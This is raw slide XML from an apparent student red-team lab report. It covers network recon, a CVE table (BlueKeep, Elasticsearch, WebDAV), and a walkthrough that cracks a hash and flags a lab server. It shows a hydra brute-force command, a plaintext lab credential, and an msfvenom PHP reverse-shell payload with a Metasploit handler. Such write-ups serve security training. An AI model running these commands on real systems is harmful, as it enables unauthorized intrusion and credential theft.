              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4"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pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;143;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="596" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411200" y="683575"/>
            <a:ext cx="5940125" cy="4083199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115425" y="2865150"/>
            <a:ext cx="1323000" cy="81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22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127875" y="3480900"/>
            <a:ext cx="1298100" cy="165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2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127875" y="4105050"/>
            <a:ext cx="1314600" cy="1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52" name="Google Shape;152;p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53" name="Google Shape;153;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="102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n"/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="30555"/>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4" name="Google Shape;154;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1"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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p24"/>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10000"/>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61" name="Google Shape;161;p24"/>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162" name="Google Shape;162;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1122550"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{8935078E-5B90-48D3-9965-6337BCE00B8E}</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Kali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Used as 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Gateway Modem</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br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerable Open Ports:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>3389/TCP  MS-WBT-SERVER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Gateway to the corporate network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Target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Vulnerable Open Ports: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22/TCP SSH</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80/TCP HTTP</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Linux web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Vulnerable Open Ports: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Port 22/TCP SSH</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Port 9200/TCP WAP-WSP</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Internal indexing and big data processing</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12300" y="0"/>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Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="120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69" name="Google Shape;169;p25"/>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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="170" name="Google Shape;170;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{8935078E-5B90-48D3-9965-6337BCE00B8E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="397450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-0708 or “Blue Keep”</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Windows Operating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RDP vulnerability exploited through Meterpreter allows for attacker to gain control of the vulnerable system, C&amp;C capability through MSVenom payload.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System can be scanned, crashed, explored for sensitive corporate data, PII and financials to be exfiltrated. The attacker can worm into other connected systems.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CVE-2014-3120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Elasticsearch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Elasticsearch vulnerability allows access to files that should be protected due primarily to no access roles or authentication.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Loss of confidentiality of data as well as the integrity of the data. Additional data can be left in the system without notification.</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CVE-2017-7269</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WebDAV buffer overflow</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The WebDAV exploit allows the attacker to create a reverse shell using the collaborative/versioning software.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Extraordinary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> C&amp;C flexibility and potential for massive exfiltration of data of all kinds.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26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1046138" y="2388963"/>
            <a:ext cx="7033867" cy="1403816"/>
            <a:chOff x="3033910" y="71936"/>
            <a:chExt cx="4848602" cy="5066100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="176" name="Google Shape;176;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3033912" y="465562"/>
              <a:ext cx="4848600" cy="4278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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3033910" y="71936"/>
              <a:ext cx="4848600" cy="5066100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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Found a reference to “company_folders/secret_folder/” which then spurred me to find the “secret_folder”. Adding the path to the URL brought up an authentication box that said “For ashton’s eyes only”. I then used a hydra brute force tool to obtain Ashton’s password within about 2 minutes (exhibit C).</a:t>
              </a:r>
              <a:endParaRPr sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="65725"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="182875">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploitation: Access to directory tree via NMap scan results</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p26"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1037078" y="885962"/>
            <a:ext cx="7069835" cy="1449148"/>
            <a:chOff x="-2340527" y="157094"/>
            <a:chExt cx="8546706" cy="7975500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="181" name="Google Shape;181;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="-2340521" y="157094"/>
              <a:ext cx="8546700" cy="79755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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2340527" y="955508"/>
              <a:ext cx="8546700" cy="7119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Performed an NMap scan (exhibit A) on the entire network that identified vulnerabilities in the gateway router, the Linux web server and the associate ELK Server. I subsequently connected directly to the Linux Web Server (exhibit B), 192.168.1.105, and was able to explore the file system with very little effort.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sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="738044" y="124381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rot="5400000">
            <a:off x="738044" y="2587088"/>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flipH="1">
            <a:off x="1019400" y="3849775"/>
            <a:ext cx="7105200" cy="7926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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019400" y="3779100"/>
            <a:ext cx="7167900" cy="856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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t># hydra -l ashton -P usr/share/wordlists/rockyou.txt -s 80 -f -v 192.168.1.105 http-get /company_folders/secret_folder </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="738032" y="3986963"/>
            <a:ext cx="261029" cy="144694"/>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SzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1960">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Explo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1960"/>
              <a:t>ita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1960">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tion once logged in a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1960"/>
              <a:t>s Ashton and subsequently Ryan in WebDAV</a:t>
            </a:r>
            <a:endParaRPr sz="1960"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="724275" y="1420660"/>
            <a:ext cx="2428500" cy="3393965"/>
            <a:chOff x="724275" y="1420725"/>
            <a:chExt cx="2428500" cy="3496050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195;p27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="724275" y="1480575"/>
              <a:ext cx="2428500" cy="3436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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="724275" y="1420725"/>
              <a:ext cx="2371500" cy="3372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Used Ashton’s access to locate the secret_folder (exhibit D) which contained instructions on how to further access portions of the network via a WebDAV login, (exhibit E). The instructions contained a text file with step by step instructions including the user name and a hashed password. A brief visit to crackstation.net converted the hash to a password (exhibit F).</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97" name="Google Shape;197;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;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99" name="Google Shape;199;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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="201" name="Google Shape;201;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2" name="Google Shape;202;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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496050" y="1439775"/>
            <a:ext cx="2428500" cy="3344700"/>
            <a:chOff x="3496050" y="1439775"/>
            <a:chExt cx="2428500" cy="3344700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="204" name="Google Shape;204;p27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3496050" y="1480575"/>
              <a:ext cx="2428500" cy="3303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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3496050" y="1439775"/>
              <a:ext cx="2428500" cy="3333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After using Ryan’s login credentials, ryan:linux4u, I was able to log into the network via the WebDAV exploit, (exhibit G). From there I used msvenom to craft a reverse shell payload (exhibit H) that was uploaded using meterpreter (exhibit I). Once I opened the shell.php file in the system I was able to search the rest of the system for the hidden flag (exhibit J and exhibit K). </a:t>
              </a:r>
              <a:endParaRPr sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="Google Shape;207;p2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8" name="Google Shape;208;p2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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6267825" y="1480563"/>
            <a:ext cx="2428500" cy="3252349"/>
            <a:chOff x="6401175" y="1481325"/>
            <a:chExt cx="2428500" cy="3252349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="Google Shape;210;p2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Commands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WebDAV connection:</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dav://192.168.1.105/webdav</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MSVenom script:</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FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>root@kali</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>~</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t># msvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4444 &gt; shell.php</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Meterpreter commands:</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msfconsole</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Use exploit/multi/handler</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set payload php/meterpreter/reverse_tcp</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Entered other </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>parameters</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t> and executed exploit, flag downloaded.</a:t>
              </a:r>
              <a:endParaRPr sz="1000">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